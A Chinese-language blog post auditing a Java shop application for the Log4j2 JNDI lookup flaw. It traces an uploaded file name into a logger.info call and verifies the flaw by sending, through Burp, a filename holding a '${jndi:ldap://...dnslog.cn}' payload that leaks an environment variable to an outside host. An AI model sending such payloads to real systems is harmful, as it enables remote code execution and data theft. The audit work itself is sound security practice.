log4j反序列化审计及修复

log4j反序列化审计及修复

​​log4j安全分析​​

本项目引入的Log4j版本为2.10.02.0

由于Apache Log4j2某些功能存在递归解析，攻&击者可在未经身份验证的情况下构造发送带有攻&击语句的数据请求包，最终造成在目标服务器上执行任意代码。其中涉及到的lookup的主要功能就是提供另外一种方式以添加某些特殊的值到日志中，以最大化松散耦合地提供可配置属性供使用者以约定的格式进行调用。

该组件漏洞主要发生在引入的​​log4j-core​​，​​log4j-api​​是不存在该问题的。​​log4j-core​​是源码，​​log4j-api​​是接口。

​​pom.xml​​文件引入Log4j组件情况如下图所示，引入了​​log4j-core​​，以及版本为​​2.10.0​​。基本确定存在问题，验证还需进一步寻找能触发的漏洞点。

由于SprinBoot默认自带日志记录框架，一般不需要引入，在​​pom.xml​​中剔除出去。如下图所示：

简单的说，就是配合log的等级过滤输出比如，你在开发的时候，要验证一个方法有没有被调用到，为了方便调试，通常会在这个方法开始的时候加一些system.out。但是项目真正发布的时候这些代码通常是要移除掉的，所以通常更建议用logger来记录所以你可能会加logger.debug。 为什么是debug而不是info error或者其他呢？因为通常项目发布的时候都会把日志等级设置为error 或者info之类的等级，在这两个等级下debug的内容是输出不了的，所以就可以做到不需要修改代码就不会输出你只有在调试的时候才需要输出的内容各个等级都是有它的含义的，虽然在代码写的时候你用debug info error都是可以，但是为了方便管理，只有调试的时候才用到日志会用debug，一些信息类的日志记录通常会用info（比如你想看一天有几个用户登录），一些错误的，或者异常信息会用error，比如某个时刻数据库连接出了问题，如果分析日志，直接搜索error开头的就能直接定位到了

一共分为五个级别：DEBUG、INFO、WARN、ERROR和FATAL。这五个级别是有顺序的，DEBUG < INFO < WARN < ERROR < FATAL

全局搜索关键字​​logger​​，如下图可以看出，本项目使用​​logger.info​​级别记录日志方式居多。

大多漏洞分析文章使用​​logger.error​​去做调试。两者区别在于默认记录信息不同，这套代码则大部分使用logger.info而两者知识默认记录的内容不一样，至于出发反序列化都是一样的经过一番探索，发现有几处日志记录拼接了变量参数，让我们看看这些参数是否是从前端传来的。如下图所示：

双击即可进入该代码文件，该文件位于​​src\main\java\com\xq\tmall\controller\admin\AccountController.java​​。该代码文件位于Controller层，主要用于和视图交互，处理用户输入的数据等操作。关键代码如下图所示：

对上述代码进行分析。触发漏洞点的代码为65行的​​logger.info("获取图片原始文件名：{}", originalFileName);​​。向上追踪，发现通过​​file.getOriginalFilename();​​获取file的文件名后赋值给​​originalFileName​​。在向上追踪，file参数来自​​admin/uploadAdminHeadImage​​接口，

黑盒验证：

下面就是两种方法：第一：根据注释提示可以看出来为​​管理员头像上传​​功能。第二：根据代码拼数据包，用一个上传图片的数据包来改第一种情况：

修改filename=“${jndi:ldap://${env:OS}.b0gbfq.dnslog.cn}”

DNSLog响应

第二种情况：通过代码拼凑出url：https://127.0.0.1:8088/tmall/admin/uploadAdminHeadImage随便找个上传功能抓包，用它的包体

再随便抓一个tmall网站的数据包，用它的包头

将请求改成POST，url替换为拼接出来的，然后更换刚才抓的包头，再改filename之后使用burp发包，就可以看到dnslog上的数据

不能出网的使用burp通fastjson验证方法

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。